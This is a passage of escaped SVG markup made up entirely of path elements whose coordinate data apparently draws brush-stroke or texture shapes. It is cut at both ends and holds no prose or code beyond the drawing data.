d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path 